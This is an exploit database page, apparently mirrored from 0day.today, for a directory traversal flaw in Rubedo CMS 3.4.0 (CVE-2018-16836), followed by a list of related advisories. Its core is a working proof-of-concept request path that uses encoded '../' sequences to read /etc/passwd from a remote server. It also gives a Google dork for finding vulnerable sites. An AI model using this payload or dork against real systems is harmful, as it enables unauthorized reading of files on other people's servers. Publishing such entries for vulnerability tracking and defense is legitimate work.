Lucene search
Marouene Boubakri1337DAY-ID-31087HistorySep 16, 2018 - 12:00 a.m.
Rubedo CMS 3.4.0 - Directory Traversal Vulnerability
2018-09-1600:00:00
Marouene Boubakri
0day.today
29
EPSS
0.235
Percentile
96.6%
Exploit for linux platform in category web applications
# Exploit Title: Rubedo CMS 3.4.0 - Directory Traversal
# Google Dork: intext:rubedo.current.page.description
# Exploit Author: Marouene Boubakri
# Vendor Homepage: https://www.rubedo-project.org
# Version: through 3.4.0
# Tested on: Linux
# CVE : CVE-2018-16836
# PoC:
# Read /etc/passwd file from remote server
/theme/default/img/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e//etc/passwd'
# 0day.today [2018-09-16] #Related
prion
prion
Directory traversal
2018-09-11 16:29:00
packetstorm
packetstorm
Rubedo CMS 3.4.0 Directory Traversal
2018-09-13 00:00:00
nuclei
nuclei
Rubedo CMS <=3.4.0 - Directory Traversal
2021-06-10 10:08:37
exploitpack
exploitpack
Rubedo CMS 3.4.0 - Directory Traversal
2018-09-12 00:00:00
osv
osv
CVE-2018-16836
2018-09-11 16:29:00
cve
cve
CVE-2018-16836
2018-09-11 16:29:00
nvd
nvd
CVE-2018-16836
2018-09-11 16:29:00
exploitdb
exploitdb
Rubedo CMS 3.4.0 - Directory Traversal
2018-09-12 00:00:00
cvelist
cvelist
CVE-2018-16836
2018-09-11 16:00:00
veracode
veracode
Directory Traversal
2018-09-12 02:59:25
openvas
openvas
Generic HTTP Directory Traversal (Web Dirs) - Active Check
2021-07-22 00:00:00